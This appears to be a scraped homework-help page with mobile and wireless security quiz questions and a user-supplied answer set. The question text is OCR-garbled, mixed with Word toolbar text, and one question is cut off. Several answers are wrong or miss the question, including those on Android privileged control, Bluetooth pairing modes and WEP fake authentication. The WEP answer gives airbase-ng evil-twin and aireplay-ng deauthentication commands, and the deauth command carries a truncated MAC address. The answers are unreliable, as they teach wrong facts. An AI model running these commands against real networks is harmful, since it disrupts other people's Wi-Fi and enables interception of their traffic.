Document3 Word ayout References Mailings Review View Help Tell me what you want
ID: 3710103 • Letter: D
Question
Document3 Word ayout References Mailings Review View Help Tell me what you want to do AaBbCcDAaBbCcDc AaBbC AaBbCcC I Normal 11 No Spac... Heading 1 Heading2 Title Paragraph Styles 1-Jack receives a text message on his phone advising him of a major attack at his bank. The message includes a link to check his accounts. After clicking the link, an attacker takes control of his accounts in the background. Which of the following attacks is Jack facing? 2- Which of the following allows an Android user to attain privileged control of the device? individual attempt to make a call using his cell phone; however, it seems unresponsive. After a few minutes of effort, he turns it off and turns it on again. During his next phone call, the phone disconnects and becomes unresponsive again. Which Bluetooth attack is underway? 4- Which of the following is a pairing mode in Bluetooth that rejects every pairing request? 5- The team has discovered an access point configured with WEP encryption. What is needed to perform a fake authentication to the AP in an effort to crack WEP? (Choose all that apply) 3Explanation / Answer
Q1.This is the Phishing attack.
Q2. app permission in android phone(Android device manager).
Q3.This may the type Bluebugging in which a user want to add through bluetooth and try many times to coonect.
Q4.You need to use undiscoverable mode or use some app to do this work there is no fixed option in bluetooth.
Q5.Cracking the wep using to create evil twin
Step1: use airbase-ng to create a fake, or evil twin, of his AP.
Open turnminal and write this command:
bt > airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 11 mon0
Step2: Deauthenticate:
bt > aireplay-ng --deauth 0 -a 00:09:5B:6F:1E
step 3:power on
iwconfig wlan0 txpower 27
Related Questions
drjack9650@gmail.com
Navigate
Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.